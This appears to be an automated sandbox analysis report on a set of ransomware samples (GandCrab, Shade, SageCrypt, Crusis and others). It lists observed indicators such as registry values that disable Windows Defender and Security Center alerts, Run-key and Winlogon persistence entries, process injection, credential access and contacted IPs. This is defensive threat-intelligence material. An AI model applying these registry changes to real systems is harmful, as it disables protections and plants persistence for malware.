adwind | e2c178ff3ce63e5df67787e3ad1c2b4a0c080482b4b29cf590c3e75c7910c0be

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	winsvcs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	winsvcs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	winsvcs.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	winsvcs.exe

Modifies firewall policy service 3 TTPs 2 IoCs

evasion

Modify Registry

Windows Service

Disable or Modify System Firewall

T1562.004

description	ioc	Process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List	Trojan-Ransom.Win32.SageCrypt.dqq-0d4ade5eb23386bac3650eed6d7e8c311d9cfc399b50674e8489a5328ccc58ea.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\Windows\system32\rundll32.exe = "C:\\Windows\\system32\\rundll32.exe:*:Enabled:rundll32"	Trojan-Ransom.Win32.SageCrypt.dqq-0d4ade5eb23386bac3650eed6d7e8c311d9cfc399b50674e8489a5328ccc58ea.exe

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos
Troldesh family
troldesh
Troldesh, Shade, Encoder.858
Troldesh is a ransomware spread by malspam.
ransomware trojan troldesh

Windows security bypass 2 TTPs 6 IoCs

evasion trojan

Disable or Modify Tools

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1"	winsvcs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1"	winsvcs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	winsvcs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	winsvcs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	winsvcs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	winsvcs.exe

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

Disable or Modify System Firewall

T1562.004

pid	Process
2372	netsh.exe
2348	netsh.exe

Executes dropped EXE 27 IoCs

pid	Process
484	HEUR-Trojan-Ransom.MSIL.Blocker.gen-df46d7a13fb63c2a7575a650b83a090f24ae1b8766be004a4c0da3e2cf92aaf9.exe
2540	HEUR-Trojan-Ransom.MSIL.Crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe
1748	HEUR-Trojan-Ransom.Win32.Blocker.gen-2596926944154f01477fb51f21d48eec37fa8976b139a9ca8293bfc5279fec49.exe
860	Trojan-Ransom.Win32.Shade.pjy-dc46178df311e85dbac68168f206272d2a49d3823a322fa023dd15691a9c1553.exe
468	Trojan-Ransom.Win32.Blocker.ldrx-6b3c7fc050b45545b98269c1c0d87eab38380510a7238ee1e914ff963d6e06f1.exe
536	HEUR-Trojan-Ransom.Win32.GandCrypt.gen-3cdd857e90e3d210c991232d4c9de9339a7f2fa941aac7c7d27dc321b4e968ca.exe
2464	Trojan-Ransom.Win32.SageCrypt.dqq-0d4ade5eb23386bac3650eed6d7e8c311d9cfc399b50674e8489a5328ccc58ea.exe
1508	HEUR-Trojan-Ransom.Win32.Generic-29d77cf18daae8e6304c61f9c2dfd22ba124576b99e190aa39552225fabf496a.exe
1484	HEUR-Trojan-Ransom.Win32.Crypmod.gen-62995e2a5c4384054be5df6c4559a9ddc407b3d02110039213e702085320c22a.exe
1664	HEUR-Trojan-Ransom.MSIL.GandCrypt.gen-96254017c302dfa9b48ccea19f5a089dcd8807c8ca8b5958c373a04b8a07e1ce.exe
1732	Trojan-Ransom.Win32.Shade.pkb-c80df024a87872e53a1df50061079e2e973673c68fc81dbdfd79d989dd8212b5.exe
772	Trojan-Ransom.Win32.SageCrypt.dqq-0d4ade5eb23386bac3650eed6d7e8c311d9cfc399b50674e8489a5328ccc58ea.exe
2636	winsvcs.exe
884	HEUR-Trojan-Ransom.MSIL.Crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe
552	heur-trojan-ransom.msil.crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe
1964	HEUR-Trojan-Ransom.MSIL.Crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe
780	heur-trojan-ransom.msil.crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe
2080	HEUR-Trojan-Ransom.MSIL.Crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe
2828	heur-trojan-ransom.msil.crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe
1052	HEUR-Trojan-Ransom.MSIL.Crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe
700	HEUR-Trojan-Ransom.MSIL.GandCrypt.gen-96254017c302dfa9b48ccea19f5a089dcd8807c8ca8b5958c373a04b8a07e1ce.exe
1756	svcc.exe
1800	heur-trojan-ransom.msil.crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe
1676	HEUR-Trojan-Ransom.MSIL.Crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe
2392	winint.exe
2000	svcc.exe
39288	Process not Found

Loads dropped DLL 15 IoCs

pid	Process
2704	cmd.exe
2704	cmd.exe
2896	taskmgr.exe
1748	HEUR-Trojan-Ransom.Win32.Blocker.gen-2596926944154f01477fb51f21d48eec37fa8976b139a9ca8293bfc5279fec49.exe
1748	HEUR-Trojan-Ransom.Win32.Blocker.gen-2596926944154f01477fb51f21d48eec37fa8976b139a9ca8293bfc5279fec49.exe
884	HEUR-Trojan-Ransom.MSIL.Crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe
552	heur-trojan-ransom.msil.crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe
2476	rundll32.exe
2476	rundll32.exe
2476	rundll32.exe
2476	rundll32.exe
2080	HEUR-Trojan-Ransom.MSIL.Crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe
2828	heur-trojan-ransom.msil.crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe
2140	cmd.exe
888	cmd.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Unexpected DNS network traffic destination 64 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	104.155.138.21
Destination IP	107.178.223.183
Destination IP	107.178.223.183
Destination IP	104.155.138.21
Destination IP	104.155.138.21
Destination IP	104.155.138.21
Destination IP	107.178.223.183
Destination IP	107.178.223.183
Destination IP	107.178.223.183
Destination IP	107.178.223.183
Destination IP	104.155.138.21
Destination IP	104.155.138.21
Destination IP	107.178.223.183
Destination IP	104.155.138.21
Destination IP	107.178.223.183
Destination IP	107.178.223.183
Destination IP	107.178.223.183
Destination IP	104.155.138.21
Destination IP	107.178.223.183
Destination IP	107.178.223.183
Destination IP	107.178.223.183
Destination IP	107.178.223.183
Destination IP	107.178.223.183
Destination IP	107.178.223.183
Destination IP	104.155.138.21
Destination IP	104.155.138.21
Destination IP	104.155.138.21
Destination IP	104.155.138.21
Destination IP	107.178.223.183
Destination IP	107.178.223.183
Destination IP	107.178.223.183
Destination IP	107.178.223.183
Destination IP	107.178.223.183
Destination IP	107.178.223.183
Destination IP	104.155.138.21
Destination IP	107.178.223.183
Destination IP	107.178.223.183
Destination IP	107.178.223.183
Destination IP	107.178.223.183
Destination IP	107.178.223.183
Destination IP	104.155.138.21
Destination IP	107.178.223.183
Destination IP	104.155.138.21
Destination IP	107.178.223.183
Destination IP	107.178.223.183
Destination IP	107.178.223.183
Destination IP	104.155.138.21
Destination IP	107.178.223.183
Destination IP	107.178.223.183
Destination IP	107.178.223.183
Destination IP	107.178.223.183
Destination IP	104.155.138.21
Destination IP	107.178.223.183
Destination IP	104.155.138.21
Destination IP	107.178.223.183
Destination IP	104.155.138.21
Destination IP	104.155.138.21
Destination IP	107.178.223.183
Destination IP	107.178.223.183
Destination IP	104.155.138.21
Destination IP	107.178.223.183
Destination IP	107.178.223.183
Destination IP	107.178.223.183
Destination IP	104.155.138.21

Windows security modification 2 TTPs 7 IoCs

evasion trojan

Disable or Modify Tools

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	winsvcs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1"	winsvcs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1"	winsvcs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	winsvcs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	winsvcs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AutoUpdateDisableNotify = "1"	winsvcs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	winsvcs.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Process not Found
Key opened	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Process not Found
Key opened	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Process not Found

Adds Run key to start application 2 TTPs 11 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\brbbot = "C:\\Users\\Admin\\AppData\\Roaming\\Trojan-Ransom.Win32.Blocker.ldrx-6b3c7fc050b45545b98269c1c0d87eab38380510a7238ee1e914ff963d6e06f1.exe"	Trojan-Ransom.Win32.Blocker.ldrx-6b3c7fc050b45545b98269c1c0d87eab38380510a7238ee1e914ff963d6e06f1.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\bqzhnfezutu = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\agaiqt.exe\""	HEUR-Trojan-Ransom.Win32.GandCrypt.gen-3cdd857e90e3d210c991232d4c9de9339a7f2fa941aac7c7d27dc321b4e968ca.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft Windows Services = "C:\\Windows\\T608060874566080\\winsvcs.exe"	HEUR-Trojan-Ransom.Win32.Blocker.gen-2596926944154f01477fb51f21d48eec37fa8976b139a9ca8293bfc5279fec49.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Windows Services = "C:\\Windows\\T608060874566080\\winsvcs.exe"	HEUR-Trojan-Ransom.Win32.Blocker.gen-2596926944154f01477fb51f21d48eec37fa8976b139a9ca8293bfc5279fec49.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\Photoshop = "C:\\Users\\Admin\\AppData\\Roaming\\Photoshop\\Realtek.exe"	heur-trojan-ransom.msil.crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\windows = "C:\\Users\\Admin\\AppData\\Local\\winint.exe -boot"	winint.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\MyOtApp = "C:\\Users\\Admin\\AppData\\Roaming\\MyOtApp\\MyOtApp.exe"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\Client Server Runtime Subsystem = "\"C:\\ProgramData\\Windows\\csrss.exe\""	Trojan-Ransom.Win32.Shade.pjy-dc46178df311e85dbac68168f206272d2a49d3823a322fa023dd15691a9c1553.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\fastrec = "rundll32.exe \"C:\\Users\\Admin\\AppData\\Local\\fastrec.dll\",fastrec"	Trojan-Ransom.Win32.SageCrypt.dqq-0d4ade5eb23386bac3650eed6d7e8c311d9cfc399b50674e8489a5328ccc58ea.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\svcc.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Temps\\svcc.exe\""	HEUR-Trojan-Ransom.MSIL.GandCrypt.gen-96254017c302dfa9b48ccea19f5a089dcd8807c8ca8b5958c373a04b8a07e1ce.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\svcc.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Temps\\svcc.exe\""	svcc.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\S:	HEUR-Trojan-Ransom.Win32.GandCrypt.gen-3cdd857e90e3d210c991232d4c9de9339a7f2fa941aac7c7d27dc321b4e968ca.exe
File opened (read-only)	\??\A:	HEUR-Trojan-Ransom.Win32.GandCrypt.gen-3cdd857e90e3d210c991232d4c9de9339a7f2fa941aac7c7d27dc321b4e968ca.exe
File opened (read-only)	\??\E:	HEUR-Trojan-Ransom.Win32.GandCrypt.gen-3cdd857e90e3d210c991232d4c9de9339a7f2fa941aac7c7d27dc321b4e968ca.exe
File opened (read-only)	\??\K:	HEUR-Trojan-Ransom.Win32.GandCrypt.gen-3cdd857e90e3d210c991232d4c9de9339a7f2fa941aac7c7d27dc321b4e968ca.exe
File opened (read-only)	\??\N:	HEUR-Trojan-Ransom.Win32.GandCrypt.gen-3cdd857e90e3d210c991232d4c9de9339a7f2fa941aac7c7d27dc321b4e968ca.exe
File opened (read-only)	\??\Z:	HEUR-Trojan-Ransom.Win32.GandCrypt.gen-3cdd857e90e3d210c991232d4c9de9339a7f2fa941aac7c7d27dc321b4e968ca.exe
File opened (read-only)	\??\B:	HEUR-Trojan-Ransom.Win32.GandCrypt.gen-3cdd857e90e3d210c991232d4c9de9339a7f2fa941aac7c7d27dc321b4e968ca.exe
File opened (read-only)	\??\G:	HEUR-Trojan-Ransom.Win32.GandCrypt.gen-3cdd857e90e3d210c991232d4c9de9339a7f2fa941aac7c7d27dc321b4e968ca.exe
File opened (read-only)	\??\H:	HEUR-Trojan-Ransom.Win32.GandCrypt.gen-3cdd857e90e3d210c991232d4c9de9339a7f2fa941aac7c7d27dc321b4e968ca.exe
File opened (read-only)	\??\O:	HEUR-Trojan-Ransom.Win32.GandCrypt.gen-3cdd857e90e3d210c991232d4c9de9339a7f2fa941aac7c7d27dc321b4e968ca.exe
File opened (read-only)	\??\V:	HEUR-Trojan-Ransom.Win32.GandCrypt.gen-3cdd857e90e3d210c991232d4c9de9339a7f2fa941aac7c7d27dc321b4e968ca.exe
File opened (read-only)	\??\Y:	HEUR-Trojan-Ransom.Win32.GandCrypt.gen-3cdd857e90e3d210c991232d4c9de9339a7f2fa941aac7c7d27dc321b4e968ca.exe
File opened (read-only)	\??\I:	HEUR-Trojan-Ransom.Win32.GandCrypt.gen-3cdd857e90e3d210c991232d4c9de9339a7f2fa941aac7c7d27dc321b4e968ca.exe
File opened (read-only)	\??\Q:	HEUR-Trojan-Ransom.Win32.GandCrypt.gen-3cdd857e90e3d210c991232d4c9de9339a7f2fa941aac7c7d27dc321b4e968ca.exe
File opened (read-only)	\??\R:	HEUR-Trojan-Ransom.Win32.GandCrypt.gen-3cdd857e90e3d210c991232d4c9de9339a7f2fa941aac7c7d27dc321b4e968ca.exe
File opened (read-only)	\??\T:	HEUR-Trojan-Ransom.Win32.GandCrypt.gen-3cdd857e90e3d210c991232d4c9de9339a7f2fa941aac7c7d27dc321b4e968ca.exe
File opened (read-only)	\??\U:	HEUR-Trojan-Ransom.Win32.GandCrypt.gen-3cdd857e90e3d210c991232d4c9de9339a7f2fa941aac7c7d27dc321b4e968ca.exe
File opened (read-only)	\??\W:	HEUR-Trojan-Ransom.Win32.GandCrypt.gen-3cdd857e90e3d210c991232d4c9de9339a7f2fa941aac7c7d27dc321b4e968ca.exe
File opened (read-only)	\??\X:	HEUR-Trojan-Ransom.Win32.GandCrypt.gen-3cdd857e90e3d210c991232d4c9de9339a7f2fa941aac7c7d27dc321b4e968ca.exe
File opened (read-only)	\??\J:	HEUR-Trojan-Ransom.Win32.GandCrypt.gen-3cdd857e90e3d210c991232d4c9de9339a7f2fa941aac7c7d27dc321b4e968ca.exe
File opened (read-only)	\??\L:	HEUR-Trojan-Ransom.Win32.GandCrypt.gen-3cdd857e90e3d210c991232d4c9de9339a7f2fa941aac7c7d27dc321b4e968ca.exe
File opened (read-only)	\??\M:	HEUR-Trojan-Ransom.Win32.GandCrypt.gen-3cdd857e90e3d210c991232d4c9de9339a7f2fa941aac7c7d27dc321b4e968ca.exe
File opened (read-only)	\??\P:	HEUR-Trojan-Ransom.Win32.GandCrypt.gen-3cdd857e90e3d210c991232d4c9de9339a7f2fa941aac7c7d27dc321b4e968ca.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
269	checkip.dyndns.org

Modifies WinLogon 2 TTPs 7 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

persistence privilege_escalation

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\fastrec\Startup = "fastrec"	Trojan-Ransom.Win32.SageCrypt.dqq-0d4ade5eb23386bac3650eed6d7e8c311d9cfc399b50674e8489a5328ccc58ea.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\fastrec	Trojan-Ransom.Win32.SageCrypt.dqq-0d4ade5eb23386bac3650eed6d7e8c311d9cfc399b50674e8489a5328ccc58ea.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify	Trojan-Ransom.Win32.SageCrypt.dqq-0d4ade5eb23386bac3650eed6d7e8c311d9cfc399b50674e8489a5328ccc58ea.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\fastrec\Impersonate = "1"	Trojan-Ransom.Win32.SageCrypt.dqq-0d4ade5eb23386bac3650eed6d7e8c311d9cfc399b50674e8489a5328ccc58ea.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\fastrec\Asynchronous = "1"	Trojan-Ransom.Win32.SageCrypt.dqq-0d4ade5eb23386bac3650eed6d7e8c311d9cfc399b50674e8489a5328ccc58ea.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\fastrec\MaxWait = "1"	Trojan-Ransom.Win32.SageCrypt.dqq-0d4ade5eb23386bac3650eed6d7e8c311d9cfc399b50674e8489a5328ccc58ea.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\fastrec\DllName = "C:\\Users\\Admin\\AppData\\Local\\fastrec.dll"	Trojan-Ransom.Win32.SageCrypt.dqq-0d4ade5eb23386bac3650eed6d7e8c311d9cfc399b50674e8489a5328ccc58ea.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\test.txt	Process not Found
File opened for modification	C:\Windows\System32\test.txt	Process not Found

Suspicious use of SetThreadContext 14 IoCs

description	pid	Process	procid_target
PID 2464 set thread context of 772	2464	Trojan-Ransom.Win32.SageCrypt.dqq-0d4ade5eb23386bac3650eed6d7e8c311d9cfc399b50674e8489a5328ccc58ea.exe	47
PID 2540 set thread context of 884	2540	HEUR-Trojan-Ransom.MSIL.Crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe	61
PID 552 set thread context of 780	552	heur-trojan-ransom.msil.crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe	89
PID 1964 set thread context of 2080	1964	HEUR-Trojan-Ransom.MSIL.Crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe	90
PID 1664 set thread context of 700	1664	HEUR-Trojan-Ransom.MSIL.GandCrypt.gen-96254017c302dfa9b48ccea19f5a089dcd8807c8ca8b5958c373a04b8a07e1ce.exe	111
PID 2828 set thread context of 1800	2828	heur-trojan-ransom.msil.crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe	118
PID 1052 set thread context of 1676	1052	HEUR-Trojan-Ransom.MSIL.Crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe	119
PID 1756 set thread context of 2000	1756	svcc.exe	175
PID 2000 set thread context of 1456	2000	svcc.exe	182
PID 2000 set thread context of 2728	2000	svcc.exe	189
PID 2000 set thread context of 308	2000	svcc.exe	196
PID 2000 set thread context of 2028	2000	svcc.exe	201
PID 2000 set thread context of 2452	2000	svcc.exe	204
PID 2392 set thread context of 39288	2392	winint.exe	4573

UPX packed file 12 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/860-59-0x0000000000400000-0x0000000000608000-memory.dmp	upx
behavioral1/memory/860-66-0x0000000000400000-0x0000000000608000-memory.dmp	upx
behavioral1/memory/860-69-0x0000000000400000-0x0000000000608000-memory.dmp	upx
behavioral1/memory/860-68-0x0000000000400000-0x0000000000608000-memory.dmp	upx
behavioral1/memory/860-65-0x0000000000400000-0x0000000000608000-memory.dmp	upx
behavioral1/memory/860-64-0x0000000000400000-0x0000000000608000-memory.dmp	upx
behavioral1/memory/1732-96-0x0000000000400000-0x0000000000608000-memory.dmp	upx
behavioral1/memory/1732-99-0x0000000000400000-0x0000000000608000-memory.dmp	upx
behavioral1/memory/1732-98-0x0000000000400000-0x0000000000608000-memory.dmp	upx
behavioral1/memory/1732-97-0x0000000000400000-0x0000000000608000-memory.dmp	upx
behavioral1/memory/1732-104-0x0000000000400000-0x0000000000608000-memory.dmp	upx
behavioral1/memory/860-155-0x0000000000400000-0x0000000000608000-memory.dmp	upx

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\T608060874566080\winsvcs.exe	HEUR-Trojan-Ransom.Win32.Blocker.gen-2596926944154f01477fb51f21d48eec37fa8976b139a9ca8293bfc5279fec49.exe
File opened for modification	C:\Windows\T608060874566080\winsvcs.exe	HEUR-Trojan-Ransom.Win32.Blocker.gen-2596926944154f01477fb51f21d48eec37fa8976b139a9ca8293bfc5279fec49.exe
File opened for modification	C:\Windows\T608060874566080	HEUR-Trojan-Ransom.Win32.Blocker.gen-2596926944154f01477fb51f21d48eec37fa8976b139a9ca8293bfc5279fec49.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

Netsh Helper DLL

T1546.007

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.GandCrypt.gen-3cdd857e90e3d210c991232d4c9de9339a7f2fa941aac7c7d27dc321b4e968ca.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.Win32.Shade.pjy-dc46178df311e85dbac68168f206272d2a49d3823a322fa023dd15691a9c1553.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.Generic-29d77cf18daae8e6304c61f9c2dfd22ba124576b99e190aa39552225fabf496a.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.Win32.SageCrypt.dqq-0d4ade5eb23386bac3650eed6d7e8c311d9cfc399b50674e8489a5328ccc58ea.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
